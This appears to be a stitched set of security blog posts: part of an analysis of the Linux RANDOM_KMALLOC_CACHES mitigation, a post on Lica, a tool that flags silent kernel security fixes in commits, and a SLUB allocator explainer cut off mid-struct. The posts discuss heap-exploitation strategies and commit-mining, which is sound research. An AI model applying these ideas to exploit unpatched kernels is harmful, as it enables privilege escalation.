 #define INIT_KMALLOC_INFO(__size, __short_size)			\
 {								\
 	.name[KMALLOC_NORMAL]  = "kmalloc-" #__short_size,	\
 	KMALLOC_RCL_NAME(__short_size)				\
 	KMALLOC_CGROUP_NAME(__short_size)			\
 	KMALLOC_DMA_NAME(__short_size)				\
+	KMALLOC_RANDOM_NAME(RANDOM_KMALLOC_CACHES_NR, __short_size)	\
 	.size = __size,						\
 }

const struct kmalloc_info_struct kmalloc_info[] __initconst = {
	INIT_KMALLOC_INFO(0, 0),
	INIT_KMALLOC_INFO(96, 96),
	INIT_KMALLOC_INFO(192, 192),
	INIT_KMALLOC_INFO(8, 8),
	INIT_KMALLOC_INFO(16, 16),
	INIT_KMALLOC_INFO(32, 32),
	INIT_KMALLOC_INFO(64, 64),
	INIT_KMALLOC_INFO(128, 128),
	INIT_KMALLOC_INFO(256, 256),
	INIT_KMALLOC_INFO(512, 512),
	INIT_KMALLOC_INFO(1024, 1k),
	INIT_KMALLOC_INFO(2048, 2k),
	INIT_KMALLOC_INFO(4096, 4k),
	INIT_KMALLOC_INFO(8192, 8k),
	INIT_KMALLOC_INFO(16384, 16k),
	INIT_KMALLOC_INFO(32768, 32k),
	INIT_KMALLOC_INFO(65536, 64k),
	INIT_KMALLOC_INFO(131072, 128k),
	INIT_KMALLOC_INFO(262144, 256k),
	INIT_KMALLOC_INFO(524288, 512k),
	INIT_KMALLOC_INFO(1048576, 1M),
	INIT_KMALLOC_INFO(2097152, 2M)
};

diff from mm/slab_common.c

Seed Setup

Moving on, we can see how the per-boot seed is generated, which is one of the values used to randomise which cache a particular kmalloc() call site is going to end up in.

This is initialised during the initial kmalloc cache creation and is stored in the the exported symbol [random_kmalloc_seed](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L398), as we can see below:

+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+unsigned long random_kmalloc_seed __ro_after_init;
+EXPORT_SYMBOL(random_kmalloc_seed);
+#endif

...

void __init create_kmalloc_caches(slab_flags_t flags)
{
    ...
+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+	random_kmalloc_seed = get_random_u64();
+#endif

diff from mm/slab_common.c

It’s worth noting here the [__init](https://elixir.bootlin.com/linux/v6.6/source/include/linux/init.h#L52) and __ro_after_init annotations. The former is a macro used to tell the kernel this code is only run during initialisation and doesn’t need to hang around in memory after everything’s setup.

__ro_after_init was introduced by Kees Cook back in 2016[1] to reduce the writable attack surface in the kernel by moving memory that’s only written to during kernel initialisation to a read-only memory region.

Kmalloc Allocations

Okay, so we’ve covered how the caches are created and the seed initialisation, how are objects then actually allocated to one of these random kmalloc caches?

As we touched on, the random cache a particular allocation ends up in comes from two factors: the kmalloc() callsite and the per-boot random_kmalloc_seed:

+static __always_inline enum kmalloc_cache_type kmalloc_type(gfp_t flags, unsigned long caller)
 {
 	/*
 	 * The most common case is KMALLOC_NORMAL, so test for it
 	 * with a single branch for all the relevant flags.
 	 */
 	if (likely((flags & KMALLOC_NOT_NORMAL_BITS) == 0))
+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+		/* RANDOM_KMALLOC_CACHES_NR (=15) copies + the KMALLOC_NORMAL */
+		return KMALLOC_RANDOM_START + hash_64(caller ^ random_kmalloc_seed,
+						      ilog2(RANDOM_KMALLOC_CACHES_NR + 1));
+#else
 		return KMALLOC_NORMAL;
+#endif

diff from include/linux/slab.h

As we can see above, when calculating the kmalloc cache type for an allocation, if the flags are appropriate for the kmalloc random caches, a hash is generated from the two values mentioned and is used to calculate the kmalloc cache type (from the [kmalloc_cache_type](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363) enum, of which there is one for each RANDOM_KMALLOC_CACHES_NR), which is then used fetch the cache from kmalloc_caches[].

static __always_inline __alloc_size(1) void *kmalloc(size_t size, gfp_t flags)
{
	if (__builtin_constant_p(size) && size) {
		unsigned int index;

		if (size > KMALLOC_MAX_CACHE_SIZE)
			return kmalloc_large(size, flags);

 		index = kmalloc_index(size);
 		return kmalloc_trace(
-				kmalloc_caches[kmalloc_type(flags)][index],
+				kmalloc_caches[kmalloc_type(flags, _RET_IP_)][index],
 				flags, size);
 	}
 	return __kmalloc(size, flags);
}

diff from include/linux/slab.h

We can see kmalloc() now passes the caller, using the [_RET_IP_](https://elixir.bootlin.com/linux/v6.6/source/include/linux/instruction_pointer.h#L7) macro, to kmalloc_type(). This means the unsigned long caller used to generate the hash is the return address for the kmalloc() call.

Thoughts

To wrap things up on the implementation side of things, lets discuss some of the pros and cons for KMALLOC_RANDOM_CACHES. As the config help text explains, the aim of this hardening feature is to make it “more difficult to spray vulnerable memory objects on the heap for the purpose of exploiting memory vulnerabilities.”[2].

It’s safe to say (I think), that within the context of the current heap exploitation meta and exploring the feature’s implementation, it does shake up the existing techniques commonly seen for shaping the heap and exploiting heap vulnerabilities.

On top of that, it’s a reasonably lightweight and performance friendly implementation, pretty much exclusively touching the slab allocator implementation.

It is because of that last point, though, that it is unable to provide any mitigation against the cache reuse and overflow techniques mentioned earlier, as this relies on manipulating the underlying page allocator which isn’t addressed by this patch.

As a result, in certain circumstances you could cause the free one of these random kmalloc cache slabs containing your vulnerable object and have it reallocated in a more favourable cache. Similar could be said for the cache overflow attacks.

An implementation specific point to note is on the use of the kmalloc return address (for kmalloc(), kmalloc_node(), __kmalloc() etc.) to determine which random kmalloc cache is used. If other parts of the kernel make wrappers around the slab API for their own purposes, such as [f2fs_kmalloc()](https://elixir.bootlin.com/linux/v6.6/source/fs/f2fs/f2fs.h#L3379), any objects using that wrapper can share the same _RET_IP_ from the slab allocators perspective and end up in the same cache.

What’s The New Meta?

Before we put our speculation hats on and start discussing what the new trends and techniques for heap exploitation might look like post RANDOM_KMALLOC_CACHES, it’s worth highlighting that just because it’s in the 6.6 kernel doesn’t mean we’ll see it for a while.

First of all, the 6.6 kernel is the latest release and it’ll be a while until we see this get sizeable uptake in the real world. Secondly, it’s currently an opt-in feature, disabled by default, so it really depends on the distros and vendors to enable this (and we all know that can take a while for security stuff! cough modprobe_path).

Additionally, there are a couple other mitigations out there that look to mitigate heap exploitation in different ways. This includes grsecurity’s AUTOSLAB[1] and the experimental mitigations being used on kCTF by Jann Horn and Matteo Rizzo (which I’d love to get into here, perhaps another post?!)[2]. These could potentially see more uptake in the long run than RANDOM_KMALLOC_CACHES, or vice versa.

But if we were interested in tackling heap exploitation in a RANDOM_KMALLOC_CACHES environment, what might it look like? As we mentioned, this implementation focuses on the slab allocator and doesn’t really touch the page allocator. As a result, the kernel is still vulnerable to cache reuse and overflow attacks.

So perhaps we see a world where “generic techniques” shift to finding new page allocator feng shui primitives, which has had less focus, to streamline the cache reuse/overflow approaches and gain LPE or perhaps to leak the random seed.

It’s hard to say this early on, and without spending more time on the problem, whether we’d shift into a new norm of generic techniques and approaches for page allocator feng shui as a result of this kind of slab hardening, or whether due to the constraints that’s simply infeasible and the shift will be to more bespoke chains per bug (which could be considered quite a win for hardening’s sake).

That said, I’m sure the same was said about previous hardening features so who knows!

Wrapping Up

Wow, we made it to the end! A 4k word deep dive into a new kernel mitigation certainly is one way to get back into the swing of things, hopefully it made a good read though :)

We talked about the new kernel mitigation RANDOM_KMALLOC_CACHES and gave some context into the problems its trying to address. Loaded with that information we explored the implementation and how that might impact current heap exploitation techniques.

I would have liked to have spent more time tinkering with the mitigation in anger and perhaps including some demos or experiments, but being realistic about my time and availability, I figured it’d be good to get this out rather than maybe get that out.

That said, maybe I’ll try write up some old heap ndays on a RANDOM_KMALLOC_CACHES=y system to try and demonstrate the different approaches required. That sounds quite fun!

Equally, I quite liked doing a breakdown and review of a new kernel feature, so perhaps I’ll do some more of that going forward (maybe the kCTF experimental mitigations???).

Anyways, you’ve endured enough of my waffling, thanks for reading! As always feel free to @me if you have any questions, suggestions or corrections :)

exit(0);

Analysing Linux Kernel Commits

sam4k — Tue, 07 Feb 2023 20:01:23 +0000

It’s been a while, hasn’t it? This post is going to be a bit of a change of pace from usual, as its actually covering some research from last year I ended up dropping.

The plan was to do some analysis of Linux kernel commits, to determine the feasibility of automating the process of finding interesting and potentially exploitable vulnerabilities, hopefully putting a novel poc or two together.

However, between both IRL circumstances and simply underestimating the time involved, this has dragged on more than I’d like for a blog post to take and I’m eager to move onto new things. But instead of putting it on the back burner, AKA never to see the light of day again, I thought I’d share the tool I ended up writing and discuss some background behind it as well as my own takeaways during my time working on this stuff.

So in this post I’ll talk a little about the background behind the motivations for looking into this and why kernel security fixes is an interesting topic. Then I’ll do a quick tl;dr on the tool, Lica (Linux Commit Analyser), I wrote and share some takeaways.

Disclaimer

Before we dive into things, some of the topics and issues I cover in this post are both complex and contentious. I want to highlight that I am by no means an expert on these things, and my thoughts here are from the experiences (and biases) of a security researcher.

Where there are gaps in my understanding or knowledge, I’ll try to the highlight them, and if anyone has any corrections or additional info please let me know, thank you!

Background

The original motivation behind this research stems from a somewhat contentious and longstanding topic of discussion amongst the Linux kernel community regarding the handling of security fixes, such as instances of “silent security fixes”.

First of all, to give some context to what we’re talking about, let’s do a quick tl;dr on kernel development and some of the terms mentioned so we’re all up to speed! (feel free to skip)

kernel dev tl;dr

“The Linux kernel is a free and open-source, monolithic, modular, multitasking, Unix-like operating system kernel […] Day-to-day development discussions take place on the Linux kernel mailing list (LKML). Changes are tracked using the version control system git” [1]

Specifically for a project using git, we can track the changes made by looking at the commits. A commit describes a set of changes made to the project by an author. If we look at projects on GitHub for example, we can see this. As of writing, the Linux kernel source tree mirror on GitHub has 1,154,596 commits that we can peruse!

That’s a lot of changes, right? The Linux kernel has guidelines and rules about submitting patches[2], but typically a commit is a logically cohesive set of changes (i.e. you won’t see a bunch of different fixes for different parts of the kernel in one commit, I hope anyway).

All these changes are organised into releases, which you can read about over at kernel.org[3], with new mainline kernels being releases every 9-10 weeks.

Important to note is the concept of backporting, whereby bug fixes introduced in latest releases are applied to older kernel releases as well. There are several long-term maintenance (aka LTS) kernel releases, to designate support for older kernels.

on (silent) security fixes

There’s been lots of discussion surrounding security fixes and how they should be handled in relation to non-security fixes in the kernel, and this dialogue has understandably evolved over the years as our concept and understanding of security has too.

It’s a complex topic and to over simplify the arguments, on either extreme of the axis you may have folks saying all fixes should be treated equally, while others would argue security fixes need to be dealt with in a specific way, highlighting the impact etc.

A recurring topic in this space is the concept of “silent security fixes”, where a commit fixing a potentially exploitable vulnerability intentionally omits information regarding the security implications/reasons behind the fix.

This has been up for debate within the community as far back, at least, as 2008 as we can seem from this post on the Full Disclosure mailing list from 2008, titled “Linux’s unofficial security-through-coverup policy” by @spendergrsec.

Now as I mentioned earlier, a lot has changed since then, and our perception of security has come a long way since then. However over the years there have still been cases of, at worst, silent security fixes or, at best, inconsistency in the handling of security fixes[5][6][7][8].

the plan

Putting this altogether, I was interested in analysing Linux kernel commits in a somewhat automated way such that I could filter for security fixes and explore trends.

With full understanding that I’m no data scientist or software engineer, I whipped up a quick (and very hacky) tool to delve around a bit and have some fun.

https://en.wikipedia.org/wiki/Linux_kernel
https://www.kernel.org/doc/html/latest/process/submitting-patches.html
https://www.kernel.org/category/releases.html
https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_vuln_exp.md#silent-fixes-from-linux-kernel-community–welcome-to-add-more-for-fun
https://arstechnica.com/information-technology/2013/05/critical-linux-vulnerability-imperils-users-even-after-silent-fix/
CVE-2022-1786 was UAF leading to LPE, with no mention in the fix commit
CVE-2022-2602 was a UAF leading to LPE, with no mention in the fix commit
CVE-2021-41073 was disclosed by @chompie1337, although the fix commit has no mention of the exploitability and they also asked her to use a non-security related email for the “Reported-by” ack (as mentioned in @chompie1337’s article here)

Lica

get ready for some peak xdev-ctf-poc-tier code

Let’s talk about the tool! I’ll try keep this brief, both for my dignity and your sanity. I put together this tool using Python to parse kernel commits and try filter them for interesting security related fixes as well as any interesting stats along the way.

sam4k/lica

Thanks to the kernel patch submission guidelines[1], there’s some level of consistency in what to expect a commit to contain, which helps us filter down the 34000 or so commits in the last 6 months to around 135 possible security fixes - neat!

Commit...... | Subsystem......... | Hits.................................... | CVE............. | Reporter.......................................... | Coverage.......
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
...
331cd9461412 | btrfs              | use-after-free                           |                  | Ye Bin                         | linux-5.15.90, linux-5.10.165, linux-5.4.230
...
cf6531d98190 | ksmbd              | use-after-free                           |                  | zdi-disclosures@trendmicro.com # ZDI-CAN-17816     | N/A            
...          
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
Now For The Stats...
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
[+] 133 commits where matched from 2448 fixes, over 33487 commits.
[+] 36 / 133 listed a reporter.
[+] 2 / 133 mentioned a CVE.
[+] Breakdown by category:
|---- UAF: 95
|---- Races: 22
|---- Generic: 15
|---- Info Leak: 10
|---- Stack Overflow: 2
...
[+] Breakdown by module:
|---- mm: 11
|---- wifi: 10
|---- drm: 8
|---- media: 6
|---- net: 5
|---- cifs: 4
|---- io_uring: 4
...

output for the last 6 months or so, checking for coverage in latest 5.15, 5.10, 5.4 at the time

Above is a sample output from Lica, analysing kernel commits over the past 180 days. Here I’ve used a really basic approach of looking for fixes via keyword in the commit summary phrase and then further filtering those fixes by looking for hits in a dictionary of common bug classes/terminology, grouped by category.

A (slightly) more nuanced approach, looking at some of the “silent fixes” from earlier, would be to grep for typical causes for bug classes + the omission of bug classes. A simple example might be check.*len for missing length checks.

It’s worth noting that while we can use a basic dictionary or even filter by specific reporters (I’m looking at you ZDI), using a bug cause focused dictionary (that omits security-centric terms) yields just as many results.

While more false positives, I think this reiterates that a determined attacker doesn’t need to just grep for “buffer overflow privesc” or a CVE to find potentially exploitable vulnerabilities. Whether that’s manually enumerating commits or using an approach like this which takes a few hours to put together, which makes me wonder why we have cases such as a researcher being ask to use a non security related email for the “Reported-by” ack[2]??

Back to Lica, I also include a naive check to see if a particular kernel release has the patch, for checking older LTS kernels for backports (the Coverage column). There’s no doubt an easier and more reliable way to do this, but hey-ho, this did the trick for now.

Anyways, I tried to make this somewhat extensible and configurable, so I’ve chucked it up on GitHub in case anyone is interested in having a play with it. You’ve been warned about the quality!

https://www.kernel.org/doc/html/latest/process/submitting-patches.html
CVE-2021-41073 was disclosed by @chompie1337, although the fix commit has no mention of the exploitability and they also asked her to use a non-security related email for the “Reported-by” ack (as mentioned in @chompie1337’s article here)

Takeaways

Despite not getting to spend much time fine tuning or tweaking the tool do some in-depth analysis, it’s been a fun little project and broaches an important discussion.

It does feel like, as a security researcher, there is still a lack of transparency and consistency in the processes and handling of security disclosures and fixes in the kernel.

Whether there’s intentional omission of security relevant information or just a difference in opinion on what constitutes relevant information, the end result is still a lack of consistency in how reported security issues are handled.

For example, I wrote about my experience disclosing a kernel vulnerability at the beginning of 2022[1]. While the process was a bit convoluted for me, after getting in touch with the right folks, I had no issues with communication and the commit referenced the reporter, CVE and vulnerability being fixed[2].

However, as I touched on earlier in the post, other researchers have had different experiences and the resulting patches can vary in their security relevant content.

On Disclosures

If you want to report a kernel vulnerability, you’ll typically end up staring at two pages:

The official kernel documentation on “Security Bugs”[3][4],
The linux-distros mailing list wiki page[5]

The tl;dr here is the kernel security team’s focus is solely on finding and applying a fix for security bugs. To allocate a CVE, inform vendors of the security impact (LPE, RCE etc.) then you need to coordinate with the linux-distros list too.

There’s been a history of friction between the policies of the two bodies, with security researchers getting caught up between the two. The most recent instance being the public disclosure of CVE-2023-0179 over on oss-security[6].

Unfortunately I don’t fully understand the root cause of the misunderstanding. As Solar Designer points out, this seems to stem from a policy change made to accommodate the kernel security team[8], as part of a wider discussion on linux-distros policy last year[9], but I’m not entirely sure what policy this disclosure broke on the kernel documentation for “Security Bugs”[3].

Beyond highlighting the work required on the part of the researcher to make sure they follow the right steps and policies, this instance also shows where this rift might end up if it things carry on the way they are, with Solar Designer commenting:

It may well be the last straw that will result in Linux kernel documentation getting updated so that reporters would not be instructed to contact linux-distros anymore (or would even be instructed not to?) On one hand, this is bad. On the other, everyone is tired of the inconsistencies and the drama.

Solar Designer then goes on to explain a potential solution to ensure oss-security still keeps up-to-date with kernel security issues if things do go south:

I suppose we (oss-security community?) could want to setup a crawler detecting likely security issues on Linux kernel mailing lists and among Linux kernel commits (including branches). This could detect even more issues than are being brought to linux-distros and oss-security now.

While somewhat ironic given the topic of this post (not that my code is fit for scale lol), its a shame that there’s still discord regarding the handling of kernel security issues when this is a debate that’s been going on for so many years at this point.

I don’t have all the information or experience to suggest any solutions for a decades long pain point, but I do hope there’s one out there and we can find it soon.

Transparency and consistency surrounding these processes helps to encourage researchers to participate in coordinated vulnerability disclosure for kernel vulns. Having more clarity around the handling and state of security fixes should also help vendors and such too, as well as help us as a community to continue to progress with regards to our attitude and approach to security.

https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/
https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216
https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html
small note, the first result on google for me is actually an older copy, from the 4.14 kernel which omits some clarity found in the latest versions
https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists
https://seclists.org/oss-sec/2023/q1/22
https://www.openwall.com/lists/oss-security/2022/05/24/1
https://seclists.org/oss-sec/2022/q2/99
https://seclists.org/oss-sec/2022/q4/221

Conclusion

Well, this one was a bit of a change of pace for me and was a step out of my comfort zone, considering I normally focus on more objective, technical subjects. That probably explains why it took so much longer to write!

Hopefully I didn’t stir the pot too much; my goals for this post were to share some takeaways from a project that otherwise would have been relegated to the recycling bin as well as shed some light on a relevant and important topic within the community.

Despite my criticism of the current status quo, I have a lot of respect for the time and effort put in by all of those involved in the Linux kernel community.

Fingers crossed this was interesting for those of you that made it this far, but don’t fear, I’ve got some more technical posts lined up for both kernel exploitation and internals!

exit(0);

Linternals: The Slab Allocator

sam4k — Wed, 09 Nov 2022 15:04:00 +0000

The monthly blog schedule has gone somewhat awry, but fear not, today we’re diving back into our Linternals series on memory allocators!

I know it’s been a while, I’ve been sidetracked with the new job and some cool personal projects, so let’s quickly highlight what we covered last time:

what we mean by memory allocators
key memory concepts such as pages, page frames, nodes and zones
piecing this together to explain the underlying allocator used by the Linux kernel, the buddy (or page) allocator, as well as touching on it’s API, pros and cons

This time we’re going to build on that and introduce another memory allocator found within the Linux kernel, the slab allocator, and it’s various flavours. So buckle up as we dive into the exciting world of SLABs, SLUBs and SLOBs.

0x03 The Slab Allocator
Next Time!

0x03 The Slab Allocator

The slab allocator is the another memory allocator used by the Linux kernel and, as we touched on last time, “sits on top of the buddy allocator”.

What I mean by this, is that while the slab allocator is another kernel memory allocator it doesn’t replace the buddy allocator. Instead it introduces a new API and features for kernel developers (which we’ll cover soon), but under the hood it uses the buddy allocator too.

So why use the slab allocator? Well, last time we touched on some of the issues and drawbacks with the buddy allocator. The purpose of the slab allocator is to[1]:

reduce internal fragmentation,
cache commonly used objects,
better utilise of hardware cache by aligning objects to the L1 or L2 caches

So while the buddy allocator excels at allocating large chunks of physically contiguous memory, the slab allocator provides better performance to kernel developers for smaller and more common allocations (which happen more often than you might think!).

Before we dive into some more detail and explain how the kernel’s slab allocator achieves this, I should highlight that the term “slab allocator” refers to a generic memory management implementation.

The Linux kernel actually has three such implementations: SLAB[2], SLUB and SLOB. SLUB is what you’re likely to see on modern desktops and servers[3], so we’ll be focusing on this implementation through out this post, but I’ll touch on the others later.

If you’re interested in its origins, slab allocation was first introduced by Jeff Bonwick back in the 90’s and you can read his paper “The Slab Allocator: An Object-Caching Kernel Memory Allocator” over on USENIX.[4] [5]

https://www.kernel.org/doc/gorman/html/understand/understand011.html
Note that “slab allocator” != “slab” != “SLAB”, confusing ik
SLUB has been the default since 2.6.23 (~2008), so by likely I mean very likely
http://www.usenix.org/publications/library/proceedings/bos94/full_papers/bonwick.ps
Thanks @bsmaalders@mas.to for the reminder to include this here :)

The Basics

At a high level, there’s 3 main parts to the SLUB allocator: caches, slabs and objects.

As we can see, these form a pretty straightforward hierarchy. Objects (i.e. stuff being allocated by the kernel) of a particular type or size are organised into caches.

Objects belonging to a cache are further grouped into slabs, which will be of a fixed size and contain a fixed number of objects.

Objects in this context are just allocations of a particular size. For example, when a process opens a seq_file[1] in Linux, the kernel will allocate space for [struct seq_operations](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/seq_file.h#L32) using the slab allocator API. This is will be a 32 byte object.

Among other things, the cache will keep tabs on which slabs are full, which slabs a partially full and when slabs are empty. Free objects within a slab will form a linked list, pointing to the next free object within that slab.

So when the kernel wants to make an allocation via the SLUB allocator, it will find the right cache (depending on type/size) and then find a partial slab to allocate that object.

If there are no partial or free slabs, the SLUB allocator will allocate some new slabs via the buddy allocator. Yep, there it is, we’re full circle now. The slabs themselves are allocated and freed using the buddy allocator we touched on last time.

Knowing this we can deduce that each slab is at least PAGE_SIZE bytes and is physically contiguous; we’ll touch more on the details in a bit!

https://www.kernel.org/doc/html/latest/filesystems/seq_file.html

Data Structures

In the last section we covered slab allocator 101 - a simplified overview of caches, slabs and objects. Surprise, surprise: the kernel implementation is a tad more complex!

I think the approach I’ll take here is to just dive right into the data structures behind the SLUB implementation and we’ll expand from there and see how it goes?!

So let’s give a quick overview at some of the kernel data structures we’re interested in when looking at the SLUB implementation:

[struct kmem_cache](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L90): represents a specific cache of objects, storing all the metadata and info necessary for managing the cache
[struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48): this is a per-cpu structure which represents the “active” slab for a particular kmem_cache on that CPU (I’ll explain this soon, dw!)
[struct kmem_cache_node](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741): this is a per-node (NUMA node) structure which tracks the partial and full slabs for a particular kmem_cache on that node that aren’t currently “active”
[struct slab](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9): this structure, as you probably guessed, represents an individual slab and was introduced in 5.17[1] (previously this information would be accessed directly from [struct page](https://elixir.bootlin.com/linux/v5.17/source/include/linux/mm_types.h#L72), but more on that soon!)

struct kmem_cache

struct kmem_cache {
	struct kmem_cache_cpu __percpu *cpu_slab;
	slab_flags_t flags;
	unsigned long min_partial;
	unsigned int size;
	unsigned int object_size;
	struct reciprocal_value reciprocal_size;
	unsigned int offset;	
#ifdef CONFIG_SLUB_CPU_PARTIAL
	unsigned int cpu_partial;
	unsigned int cpu_partial_slabs;
#endif
	struct kmem_cache_order_objects oo;

	/* Allocation and freeing of slabs */
	struct kmem_cache_order_objects min;
	gfp_t allocflags;	
	int refcount;		/* Refcount for slab cache destroy */
	void (*ctor)(void *);
	...
	const char *name;	/* Name (only for display!) */
	struct list_head list;	/* List of slab caches */
	...
	struct kmem_cache_node *node[MAX_NUMNODES];
};

comments stripped for redundancy, from /include/linux/slub_def.h

As you might expect from the structure that underpins the SLUB allocator’s cache implementation, there’s a lot to unpack here! Let’s break down the key bits.

name stores the printable name for the cache, e.g. seen in the command slabtop (we’ll cover introspection more later). Nothing wild here.

object_size is the size, in bytes, of the objects (read: allocations) in this cache excluding metadata. Wheras size is the size, in bytes, including any metadata. Typically there is no additional metadata stored in SLUB objects, so these will be the same.

flags holds the flags that can be set when creating a kmem_cache object. I won’t go in to detail, but these can be used for debugging, error handling, alignment etc. [2]

[struct kmem_cache_order_objects](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L83) oo is a neat word-sized structure that simply contains one member: unsigned int x.

This is used to store both the order[3] of the slabs in this cache (in the upper bits) and the number of objects that they can contain (in the lower bits). There are then helpers to fetch either of these values ([oo_objects()](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L419) and [oo_order()](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L414)).

min I believe stores the minimum oo counts for slabs without any debugging or extra metadata enabled. Such that when enabling those features, the kernel can compare if oo has increased from min and decided whether to still enable them if desired.

reciprocal_size is, well, the reciprocal of size. If you also don’t math, this is basically the properly calculated value of 1/size. This is used by [obj_to_index()](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L179) for determining the index of an object within a slab.

list is a linked list of all struct kmem_cache on the system and is exported as [slab_caches](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L258).

So far we’ve covered some of the main metadata, but now we’ll dive into some of the members involved in actually facilitating allocations.

cpu_slab is a per CPU reference to a [struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48). This means that under-the-hood this is an array of sorts and each CPU uses a different index[4], thus having a reference to a different [struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48).

We’ll touch more in this structure soon, but it represents the “active” slab for a given CPU. This means that any allocations made by a CPU will come from this slab (or at least this slab will be checked first!).

node[MAX_NUMNODES] on the other hand is a per node reference to a [struct kmem_cache_node](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741). This structure holds information on all the other slabs (partial, full etc.) within this node and is the next port of call after cpu_slab.

min_partial defines the minimum number of slabs in a partial list, even if they’re empty. Typically when a slab is empty, it will be freed back to the buddy allocator, unless there is min_partial or less slabs in the partial list!

offset stores the “free pointer offset”. My educated guess is that this is the byte offset into an object where the free pointer (i.e. pointer to next free object in the slab) is found. This would usually be zero and probably changes with debugging/flag tweaks.

[CONFIG_SLUB_CPU_PARTIAL](https://cateee.net/lkddb/web-lkddb/SLUB_CPU_PARTIAL.html) enables [struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48) to not just track a per CPU “active” slab but also have its own per CPU partial list. After explaining the roles of cpu_slab and node[] the benefits should become clearer.

cpu_partial and cpu_partial_slabs define the number of partial objects and partial slabs to keep around.

allocflags allows a cache to define GFP flags[5] to apply to allocations, which can determine allocator behaviour. These can also be added through the allocation API.

ctor() lets the cache define a constructor to be called on the object during [setup_object()](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L1806) which is called when a new slab is allocated.

And that’s more or less all the key fields in kmem_cache! Hopefully that provided some additional context around the main structure underpinning the cache implementation, and we can dive into the next two with enough context to get along.

There’s of course some fields I missed out, associated with debugging, mitigations or other bits and pieces that probably didn’t justify the bloat but I may come back to some time.

struct kmem_cache_cpu

struct kmem_cache_cpu {
	void **freelist;	/* Pointer to next available object */
	unsigned long tid;	/* Globally unique transaction id */
	struct slab *slab;	/* The slab from which we are allocating */
#ifdef CONFIG_SLUB_CPU_PARTIAL
	struct slab *partial;	/* Partially allocated frozen slabs */
#endif
	local_lock_t lock;	/* Protects the fields above */
#ifdef CONFIG_SLUB_STATS
	unsigned stat[NR_SLUB_STAT_ITEMS];
#endif
};

/include/linux/slub_def.h

Bet you’re breathing a sigh of relief at that 12 liner, eh? I know I am writing this lol. Anyway, let’s dive into [struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48), which tracks an active slab (and partial list) for a specific CPU.

freelist points to the next available (free) object in the active slab, slab. This is a void ** as each free object contains a pointer to the next free object in the slab.

slab points to the [struct slab](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9) representing the “active” slab, i.e. the slab from which we’re allocating from for this CPU. We’ll explore this more soon.

partial is the per cpu partial list we mentioned earlier, when [CONFIG_SLUB_CPU_PARTIAL](https://cateee.net/lkddb/web-lkddb/SLUB_CPU_PARTIAL.html) is enabled (it should be on server/desktop). This points to a list of partially full [struct slab](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9).

u and me both

Okay so let’s move away from dry member descriptions and actually look at some examples of how SLUB might serve an allocation request!

In this example lets say a kernel driver has requested to allocate a 512 byte object via the SLUB allocator API (spoiler: it’s kmalloc()), from the general purpose cache for 512 byte objects, kmalloc-512. There’s a couple of ways this can do down!

If cache->cpu_slab->slab has several free objects, things are fairly simple. The address of the object pointed to by cache->cpu_slab->freelist will be returned to the caller.

The freelist will be updated to point to the next free object in cache->cpu_slab->slab and relevant metadata will be updated regarding this allocation.

the addr of new obj is returned to the caller

Before we dive into other allocation scenarios, let’s cover one more structure (sorry)!

struct kmem_cache_node

struct kmem_cache_node {
	spinlock_t list_lock;

	unsigned long nr_partial;
	struct list_head partial;
#ifdef CONFIG_SLUB_DEBUG
	atomic_long_t nr_slabs;
	atomic_long_t total_objects;
	struct list_head full;
#endif
};

/mm/slab.h

We’re almost their folks! This structure tracks the partially full (partial) and full slabs for a particular node. We’re talking about NUMA nodes here, which we very briefly touched on in the last post.

The tl;dr here is many CPUs can belong to one node. You can see your node information on Linux with the command numactl -H, which will let you know how many nodes you have and the CPUs that belong to each node!

partial is a linked list of partially full struct slabs. The number of which is tracked by nr_partial, which should always be greater or equal than kmem_cache->min_partial, as we touched on earlier.

full is a linked list of full struct slabs. Not much else to say about that!

nr_slabs is the total number of slabs tracked by this kmem_cache_node. Similarly, total_objects tracks the total number of allocated objects.

So now we have more context about the internal SLUB structures, let’s take what we know and apply that to a different allocation path, using the scenario from before.

If the new obj returned to the caller is the last free object in cache->cpu_slab->slab, the “active” slab is moved into it’s node’s full list. The first slab from cache->cpu_slab->partial is then made the “active” slab.

As you can imagine, there’s many potential allocation paths depending on the internal cache state. Similarly, there are multiple paths when an object is freed.

I won’t walk through all the possible cases here, but hopefully this post provides enough details to fill in the blanks!

struct slab

struct slab {
	unsigned long __page_flags;

	union {
		struct list_head slab_list;
		struct rcu_head rcu_head;
#ifdef CONFIG_SLUB_CPU_PARTIAL
		struct {
			struct slab *next;
			int slabs;	/* Nr of slabs left */
		};
#endif
	};
	struct kmem_cache *slab_cache;
	/* Double-word boundary */
	void *freelist;		/* first free object */
	union {
		unsigned long counters;
